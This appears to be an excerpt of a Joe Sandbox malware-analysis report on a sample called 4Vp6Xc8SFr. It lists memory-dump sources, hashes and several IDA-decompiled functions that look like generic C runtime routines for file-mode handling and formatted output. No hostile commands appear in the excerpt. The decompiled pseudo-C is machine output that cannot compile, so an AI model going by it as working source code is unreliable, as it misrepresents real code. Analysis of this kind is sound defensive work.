Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b489bde36cc5a8e6255924dcfd4ea6daa6e2d88b508b57d1d1e298d201e61c0f
Instruction ID: 89a73ab90181fecd740a4eb16345590fde5fa47b66d40c7f2917b63b11ec211a
Opcode Fuzzy Hash: b489bde36cc5a8e6255924dcfd4ea6daa6e2d88b508b57d1d1e298d201e61c0f
Instruction Fuzzy Hash: 19B17D72908685C5FB66AF39804013CBBA0F769B48FE40176CE4E47396EF2ED661C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8ED668 Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00007FF77FF7DA8ED668(void* __rax, long long __rbx, unsigned int* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40, intOrPtr _a48, void* _a64, long long _a80) {
				long long _v48;
				signed long long _v56;
				long long _t37;
				long long _t44;
				unsigned int* _t49;
				void* _t51;
				void* _t58;

				_a8 = __rbx;
				_a16 = __rsi;
				_t58 = __r8;
				_t49 = __rcx;
				if (__rdx != 0) goto 0xda8ed6b8;
				_t44 = _a80;
				_v48 = _t44;
				 *((char*)(_t44 + 0x30)) = 1;
				 *((intOrPtr*)(_t44 + 0x2c)) = __rdx + 0x16;
				_v56 = _v56 & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FF77FF7DA8E9C34(__rax, __rbx, _t44, __rdx, __rsi, _t51, __r8);
				goto 0xda8ed927;
				if (_t58 != 0) goto 0xda8ed6d8;
				_t37 = _a80;
				_v48 = _t37;
				 *((char*)(_t37 + 0x30)) = 1;
				 *((intOrPtr*)(_t37 + 0x2c)) = 0x16;
				goto 0xda8ed69c;
				if (__r9 == 0) goto 0xda8ed6bd;
				if (_a40 == 0) goto 0xda8ed6bd;
				if (_a48 == 0x41) goto 0xda8ed703;
				if (_t44 - 0x45 - 2 <= 0) goto 0xda8ed703;
				sil = 0;
				goto 0xda8ed706;
				sil = 1;
				if (0 != 0) goto 0xda8ed7fd;
				if ( *_t49 >> 0x34 != 0x7ff) goto 0xda8ed7fd;
				r8d = 0xc;
			}

0x7ff7da8ed668
0x7ff7da8ed66d
0x7ff7da8ed677
0x7ff7da8ed67d
0x7ff7da8ed683
0x7ff7da8ed685
0x7ff7da8ed690
0x7ff7da8ed695
0x7ff7da8ed699
0x7ff7da8ed69c
0x7ff7da8ed6a2
0x7ff7da8ed6a5
0x7ff7da8ed6ac
0x7ff7da8ed6b3
0x7ff7da8ed6bb
0x7ff7da8ed6bd
0x7ff7da8ed6ca
0x7ff7da8ed6cf
0x7ff7da8ed6d3
0x7ff7da8ed6d6
0x7ff7da8ed6db
0x7ff7da8ed6e8
0x7ff7da8ed6f4
0x7ff7da8ed6fc
0x7ff7da8ed6fe
0x7ff7da8ed701
0x7ff7da8ed703
0x7ff7da8ed711
0x7ff7da8ed72c
0x7ff7da8ed73f

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faff0602bb7e4fe5018f8c9b5950a7f6d45288abb49ae27aad1b6bc2f71a509b
Instruction ID: 4db65d4c507fc0d0c61be44ec801e7d28c9271902b55eb28b01ce0356d4aff22
Opcode Fuzzy Hash: faff0602bb7e4fe5018f8c9b5950a7f6d45288abb49ae27aad1b6bc2f71a509b
Instruction Fuzzy Hash: CB810373A08281C6FB75EB19A84036DFA90FB95794FC04276DE8D47B86DE3ED6148B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F5770 Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00007FF77FF7DA8F5770(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, intOrPtr* __r9) {
				void* __rdi;
				signed int _t49;
				signed int _t53;
				void* _t59;
				void* _t66;
				signed int _t85;
				signed int _t96;
				signed int _t97;
				void* _t101;
				void* _t111;
				void* _t112;
				intOrPtr* _t130;
				signed int* _t135;
				void* _t141;
				long long _t145;
				void* _t148;
				void* _t149;
				void* _t154;
				void* _t155;
				intOrPtr* _t156;
				void* _t158;

				_t132 = __rbx;
				_t154 = _t148;
				 *((long long*)(_t154 + 0x10)) = __rbx;
				 *((long long*)(_t154 + 0x18)) = _t145;
				 *((long long*)(_t154 + 0x20)) = __rsi;
				_push(_t141);
				_t149 = _t148 - 0x30;
				 *((char*)(__r9)) = 0;
				r10d = r10d & 0x0000003f;
				_t156 = __r9;
				_t96 = r8d;
				_t130 =  *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8));
				if ( *((intOrPtr*)(_t130 + 0x38 + (__ecx + __ecx * 8) * 8)) >= 0) goto 0xda8f59c0;
				if ((0x00074000 & r8d) != 0) goto 0xda8f57ec;
				_t135 = _t154 + 8;
				 *(_t149 + 0x50) = 0;
				_t101 = E00007FF77FF7DA8E56BC(_t130, _t135);
				if (_t101 != 0) goto 0xda8f59db;
				if (_t101 != 0) goto 0xda8f5826;
				asm("bts esi, 0xe");
				if ((_t96 & 0x00074000) == 0x4000) goto 0xda8f583c;
				if ((0xffffbfff & _t135 - 0x00010000) == 0) goto 0xda8f582a;
				if ((0xffffbfff & _t135 - 0x00020000) == 0) goto 0xda8f5837;
				_t49 = _t135 - 0x40000;
				if ((0xffffbfff & _t49) != 0) goto 0xda8f583f;
				 *((char*)(__r9)) = 1;
				goto 0xda8f583f;
				_t97 = _t96 | _t49;
				goto 0xda8f57ec;
				if ((_t97 & 0x00000301) != 0x301) goto 0xda8f583f;
				 *__r9 = dil;
				goto 0xda8f583f;
				 *((char*)(__r9)) = 0;
				if ((_t97 & 0x00070000) == 0) goto 0xda8f59c0;
				if (( *__rdx & 0x00000040) != 0) goto 0xda8f59c0;
				_t53 = __rdx[4] & 0xc0000000;
				if (_t53 == 0x40000000) goto 0xda8f587b;
				if (_t53 == 0x80000000) goto 0xda8f58f9;
				_t111 = _t53 - 0xc0000000;
				if (_t111 != 0) goto 0xda8f59c0;
				if (_t111 == 0) goto 0xda8f589b;
				if (_t111 == 0) goto 0xda8f589b;
				if (_t111 == 0) goto 0xda8f58bf;
				if (_t111 == 0) goto 0xda8f58bf;
				_t112 = __rdx[8] - 0xfffffffffffffffe - 1;
				if (_t112 != 0) goto 0xda8f59c0;
				 *(_t149 + 0x50) = 0;
				if (_t112 == 0) goto 0xda8f598a;
				if ( *((char*)(__r9)) - 1 != 1) goto 0xda8f59c0;
				goto 0xda8f5994;
				r8d = 2;
				E00007FF77FF7DA8EB6A4(_t130, __rbx, _t141, _t158, _t155);
				if (_t130 == 0) goto 0xda8f589b;
				r8d = 0;
				E00007FF77FF7DA8EB6A4(_t130, _t132, _t141);
				if (_t130 != 0xffffffff) goto 0xda8f58f0;
				E00007FF77FF7DA8E4394(_t130);
				goto 0xda8f59c2;
				if ((__rdx[4] & 0x80000000) == 0) goto 0xda8f59c0;
				r8d = 3;
				 *(_t149 + 0x50) = 0;
				_t59 = E00007FF77FF7DA8EAE7C(0, r15d, _t130, _t132, _t149 + 0x50);
				if (_t59 == 0xffffffff) goto 0xda8f58e4;
				if (_t59 == 2) goto 0xda8f5932;
				if (_t59 != 3) goto 0xda8f5972;
				if ( *(_t149 + 0x50) != 0xbfbbef) goto 0xda8f5932;
				 *_t156 = 1;
				goto 0xda8f59c0;
				_t85 =  *(_t149 + 0x50) & 0x0000ffff;
				if (_t85 != 0xfffe) goto 0xda8f594c;
				E00007FF77FF7DA8E4394(_t130);
				 *_t130 = 0x16;
				goto 0xda8f58e4;
				if (_t85 != 0xfeff) goto 0xda8f5972;
				r8d = 0;
				E00007FF77FF7DA8EB6A4(_t130, _t132, _t141);
				if (_t130 == 0xffffffff) goto 0xda8f58e4;
				 *_t156 = dil;
				goto 0xda8f59c0;
				r8d = 0;
				E00007FF77FF7DA8EB6A4(_t130, _t132, _t141);
				if (_t130 != 0xffffffff) goto 0xda8f59c0;
				goto 0xda8f58e4;
				 *(_t149 + 0x50) = 0xbfbbef;
				r8d = 3;
				r8d = r8d;
				_t66 = E00007FF77FF7DA8EC1C8(0, _t132, _t141);
				if (_t66 == 0xffffffff) goto 0xda8f58e4;
				if (3 - 0 + _t66 > 0) goto 0xda8f5998;
				return 0;
			}

0x7ff7da8f5770
0x7ff7da8f5770
0x7ff7da8f5773
0x7ff7da8f5777
0x7ff7da8f577b
0x7ff7da8f577f
0x7ff7da8f5784
0x7ff7da8f5790
0x7ff7da8f5793
0x7ff7da8f57a1
0x7ff7da8f57a8
0x7ff7da8f57b2
0x7ff7da8f57bb
0x7ff7da8f57c9
0x7ff7da8f57cb
0x7ff7da8f57cf
0x7ff7da8f57d8
0x7ff7da8f57da
0x7ff7da8f57e6
0x7ff7da8f57e8
0x7ff7da8f57fb
0x7ff7da8f580a
0x7ff7da8f5814
0x7ff7da8f5816
0x7ff7da8f581e
0x7ff7da8f5820
0x7ff7da8f5824
0x7ff7da8f5826
0x7ff7da8f5828
0x7ff7da8f5835
0x7ff7da8f5837
0x7ff7da8f583a
0x7ff7da8f583c
0x7ff7da8f5845
0x7ff7da8f584f
0x7ff7da8f585d
0x7ff7da8f5869
0x7ff7da8f586d
0x7ff7da8f5873
0x7ff7da8f5875
0x7ff7da8f5881
0x7ff7da8f5886
0x7ff7da8f588b
0x7ff7da8f5890
0x7ff7da8f5892
0x7ff7da8f5895
0x7ff7da8f589f
0x7ff7da8f58a6
0x7ff7da8f58af
0x7ff7da8f58ba
0x7ff7da8f58bf
0x7ff7da8f58c7
0x7ff7da8f58cf
0x7ff7da8f58d1
0x7ff7da8f58d9
0x7ff7da8f58e2
0x7ff7da8f58e4
0x7ff7da8f58eb
0x7ff7da8f58f3
0x7ff7da8f58f9
0x7ff7da8f58ff
0x7ff7da8f590b
0x7ff7da8f5913
0x7ff7da8f5917
0x7ff7da8f591c
0x7ff7da8f5927
0x7ff7da8f5929
0x7ff7da8f592d
0x7ff7da8f5932
0x7ff7da8f593d
0x7ff7da8f593f
0x7ff7da8f5944
0x7ff7da8f594a
0x7ff7da8f5953
0x7ff7da8f5955
0x7ff7da8f595e
0x7ff7da8f5967
0x7ff7da8f596d
0x7ff7da8f5970
0x7ff7da8f5972
0x7ff7da8f597a
0x7ff7da8f5983
0x7ff7da8f5985
0x7ff7da8f5994
0x7ff7da8f5998
0x7ff7da8f59a3
0x7ff7da8f59ac
0x7ff7da8f59b4
0x7ff7da8f59be
0x7ff7da8f59da

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1a393f0da6a9aa0cd8df53839c99000598b35257faab01b46d85da189d16e6c8
Instruction ID: 25419fb27d11332d8f0cb4e4393f5bb9fb34dab87e9fcdbcde89dc3fd3547842
Opcode Fuzzy Hash: 1a393f0da6a9aa0cd8df53839c99000598b35257faab01b46d85da189d16e6c8
Instruction Fuzzy Hash: 1A61E722F1C28346FB2EA928945433EE681BF60770FD44277DE5D866D7DE6DE8208720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E0AF4 Relevance: .1, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00007FF77FF7DA8E0AF4(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t98;
				intOrPtr _t99;
				signed int _t106;
				void* _t114;
				intOrPtr _t118;
				void* _t123;
				intOrPtr* _t126;
				intOrPtr _t127;
				char* _t128;
				intOrPtr* _t129;
				void* _t133;
				intOrPtr _t144;
				void* _t148;
				void* _t151;
				void* _t153;
				void* _t154;

				_t114 = _t148;
				 *((long long*)(_t114 + 8)) = __rbx;
				 *((long long*)(_t114 + 0x10)) = __rbp;
				 *((long long*)(_t114 + 0x18)) = __rsi;
				 *((long long*)(_t114 + 0x20)) = __rdi;
				_push(_t154);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t123 = __rcx;
				r14d = 8;
				_t98 = r8d - 5;
				if (_t98 > 0) goto 0xda8e0bf0;
				if (_t98 == 0) goto 0xda8e0b56;
				_t99 = r8d;
				if (_t99 == 0) goto 0xda8e0c47;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e0bc7;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e0b9f;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e0c47;
				if (r8d != 1) goto 0xda8e0c13;
				_t83 =  *(__rcx + 0x28);
				_t126 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0b89;
				if ( *_t126 >= 0) goto 0xda8e0b89;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e0c73;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e0c8a;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0bc2;
				goto 0xda8e0b72;
				goto 0xda8e0b72;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
				if (_t106 == 0) goto 0xda8e0beb;
				goto 0xda8e0b72;
				goto 0xda8e0b72;
				r8d = r8d - 6;
				if (_t106 == 0) goto 0xda8e0b56;
				r8d = r8d - 1;
				if (_t106 == 0) goto 0xda8e0b56;
				r8d = r8d - 2;
				if (_t106 == 0) goto 0xda8e0b56;
				goto 0xda8e0b42;
				_t118 =  *((intOrPtr*)(_t128 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t118 + 0x30)) = 1;
				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t128 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
				goto 0xda8e0ce2;
				_t129 =  *((intOrPtr*)(_t128 + 0x18));
				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
				if (0 == 0) goto 0xda8e0c6c;
				_t144 =  *_t129;
				goto 0xda8e0b72;
				goto 0xda8e0b72;
				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFDD8(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
				if (_t144 != 0) goto 0xda8e0c93;
				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
				 *((char*)(_t123 + 0x4c)) = 1;
				r8b = bpl;
				if (_t154 != _t154) goto 0xda8e0cac;
				E00007FF77FF7DA8E1914(0, _t123, _t144, _t153);
				goto 0xda8e0cb3;
				E00007FF77FF7DA8E1590(0,  *_t129, _t123, _t153);
				if (0 == 0) goto 0xda8e0ce0;
				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xda8e0cd1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xda8e0ce0;
				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e0af4
0x7ff7da8e0af7
0x7ff7da8e0afb
0x7ff7da8e0aff
0x7ff7da8e0b03
0x7ff7da8e0b07
0x7ff7da8e0b0d
0x7ff7da8e0b11
0x7ff7da8e0b14
0x7ff7da8e0b17
0x7ff7da8e0b1d
0x7ff7da8e0b21
0x7ff7da8e0b27
0x7ff7da8e0b29
0x7ff7da8e0b2c
0x7ff7da8e0b32
0x7ff7da8e0b36
0x7ff7da8e0b3c
0x7ff7da8e0b40
0x7ff7da8e0b42
0x7ff7da8e0b46
0x7ff7da8e0b50
0x7ff7da8e0b56
0x7ff7da8e0b5c
0x7ff7da8e0b6b
0x7ff7da8e0b79
0x7ff7da8e0b7e
0x7ff7da8e0b86
0x7ff7da8e0b8d
0x7ff7da8e0b93
0x7ff7da8e0b9a
0x7ff7da8e0ba7
0x7ff7da8e0bb6
0x7ff7da8e0bba
0x7ff7da8e0bc0
0x7ff7da8e0bc5
0x7ff7da8e0bcf
0x7ff7da8e0bd8
0x7ff7da8e0bdf
0x7ff7da8e0be3
0x7ff7da8e0be9
0x7ff7da8e0bee
0x7ff7da8e0bf0
0x7ff7da8e0bf4
0x7ff7da8e0bfa
0x7ff7da8e0bfe
0x7ff7da8e0c04
0x7ff7da8e0c08
0x7ff7da8e0c0e
0x7ff7da8e0c13
0x7ff7da8e0c17
0x7ff7da8e0c1a
0x7ff7da8e0c1f
0x7ff7da8e0c23
0x7ff7da8e0c30
0x7ff7da8e0c35
0x7ff7da8e0c3b
0x7ff7da8e0c42
0x7ff7da8e0c4f
0x7ff7da8e0c5e
0x7ff7da8e0c62
0x7ff7da8e0c64
0x7ff7da8e0c67
0x7ff7da8e0c6e
0x7ff7da8e0c7e
0x7ff7da8e0c85
0x7ff7da8e0c8d
0x7ff7da8e0c8f
0x7ff7da8e0c93
0x7ff7da8e0c97
0x7ff7da8e0ca0
0x7ff7da8e0ca5
0x7ff7da8e0caa
0x7ff7da8e0cae
0x7ff7da8e0cbb
0x7ff7da8e0cc6
0x7ff7da8e0ccf
0x7ff7da8e0cd1
0x7ff7da8e0cda
0x7ff7da8e0cdd
0x7ff7da8e0cfc

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
Instruction ID: af8d0d78edf08b6b2c0d2e5c7c97a3e9ab5b933fe6635aa57b4c3e4f389f3127
Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
Instruction Fuzzy Hash: F8516336A58691C5F7259B29C04022C63B0FBA4B68FA44572CE4D0779ACB3FEA63C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E1314 Relevance: .1, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00007FF77FF7DA8E1314(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t98;
				intOrPtr _t99;
				signed int _t106;
				void* _t114;
				intOrPtr _t118;
				void* _t123;
				intOrPtr* _t126;
				intOrPtr _t127;
				char* _t128;
				intOrPtr* _t129;
				void* _t133;
				intOrPtr _t144;
				void* _t148;
				void* _t151;
				void* _t153;

				_t114 = _t148;
				 *((long long*)(_t114 + 8)) = __rbx;
				 *((long long*)(_t114 + 0x10)) = __rbp;
				 *((long long*)(_t114 + 0x18)) = __rsi;
				 *((long long*)(_t114 + 0x20)) = __rdi;
				_push(_t153);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t123 = __rcx;
				r14d = 8;
				_t98 = r8d - 5;
				if (_t98 > 0) goto 0xda8e1410;
				if (_t98 == 0) goto 0xda8e1376;
				_t99 = r8d;
				if (_t99 == 0) goto 0xda8e1467;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e13e7;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e13bf;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e1467;
				if (r8d != 1) goto 0xda8e1433;
				_t83 =  *(__rcx + 0x28);
				_t126 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e13a9;
				if ( *_t126 >= 0) goto 0xda8e13a9;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e1493;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e14aa;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e13e2;
				goto 0xda8e1392;
				goto 0xda8e1392;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
				if (_t106 == 0) goto 0xda8e140b;
				goto 0xda8e1392;
				goto 0xda8e1392;
				r8d = r8d - 6;
				if (_t106 == 0) goto 0xda8e1376;
				r8d = r8d - 1;
				if (_t106 == 0) goto 0xda8e1376;
				r8d = r8d - 2;
				if (_t106 == 0) goto 0xda8e1376;
				goto 0xda8e1362;
				_t118 =  *((intOrPtr*)(_t128 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t118 + 0x30)) = 1;
				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t128 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
				goto 0xda8e1502;
				_t129 =  *((intOrPtr*)(_t128 + 0x18));
				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
				if (0 == 0) goto 0xda8e148c;
				_t144 =  *_t129;
				goto 0xda8e1392;
				goto 0xda8e1392;
				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFDD8(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
				if (_t144 != 0) goto 0xda8e14b3;
				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
				 *((char*)(_t123 + 0x4c)) = 1;
				r8b = bpl;
				if (_t153 != _t153) goto 0xda8e14cc;
				E00007FF77FF7DA8E1B94( *(_t128 + 0x28) & 0xfffffff7, _t123, _t144,  *((intOrPtr*)(_t123 + 8)));
				goto 0xda8e14d3;
				E00007FF77FF7DA8E1804( *_t129, _t123,  *((intOrPtr*)(_t123 + 8)));
				if (0 == 0) goto 0xda8e1500;
				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xda8e14f1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xda8e1500;
				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e1314
0x7ff7da8e1317
0x7ff7da8e131b
0x7ff7da8e131f
0x7ff7da8e1323
0x7ff7da8e1327
0x7ff7da8e132d
0x7ff7da8e1331
0x7ff7da8e1334
0x7ff7da8e1337
0x7ff7da8e133d
0x7ff7da8e1341
0x7ff7da8e1347
0x7ff7da8e1349
0x7ff7da8e134c
0x7ff7da8e1352
0x7ff7da8e1356
0x7ff7da8e135c
0x7ff7da8e1360
0x7ff7da8e1362
0x7ff7da8e1366
0x7ff7da8e1370
0x7ff7da8e1376
0x7ff7da8e137c
0x7ff7da8e138b
0x7ff7da8e1399
0x7ff7da8e139e
0x7ff7da8e13a6
0x7ff7da8e13ad
0x7ff7da8e13b3
0x7ff7da8e13ba
0x7ff7da8e13c7
0x7ff7da8e13d6
0x7ff7da8e13da
0x7ff7da8e13e0
0x7ff7da8e13e5
0x7ff7da8e13ef
0x7ff7da8e13f8
0x7ff7da8e13ff
0x7ff7da8e1403
0x7ff7da8e1409
0x7ff7da8e140e
0x7ff7da8e1410
0x7ff7da8e1414
0x7ff7da8e141a
0x7ff7da8e141e
0x7ff7da8e1424
0x7ff7da8e1428
0x7ff7da8e142e
0x7ff7da8e1433
0x7ff7da8e1437
0x7ff7da8e143a
0x7ff7da8e143f
0x7ff7da8e1443
0x7ff7da8e1450
0x7ff7da8e1455
0x7ff7da8e145b
0x7ff7da8e1462
0x7ff7da8e146f
0x7ff7da8e147e
0x7ff7da8e1482
0x7ff7da8e1484
0x7ff7da8e1487
0x7ff7da8e148e
0x7ff7da8e149e
0x7ff7da8e14a5
0x7ff7da8e14ad
0x7ff7da8e14af
0x7ff7da8e14b3
0x7ff7da8e14b7
0x7ff7da8e14c0
0x7ff7da8e14c5
0x7ff7da8e14ca
0x7ff7da8e14ce
0x7ff7da8e14db
0x7ff7da8e14e6
0x7ff7da8e14ef
0x7ff7da8e14f1
0x7ff7da8e14fa
0x7ff7da8e14fd
0x7ff7da8e151c

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
Instruction ID: 908cefc1a96a432cadfd8df9ff2ebf8eda8527af3df7f672735bcbdcd0a85084
Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
Instruction Fuzzy Hash: 0C519072A18A51C2F7259B29C04023CA3A1FB75B59FA44172CE4D07BD6CB3FE962C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E0F04 Relevance: .1, Instructions: 146
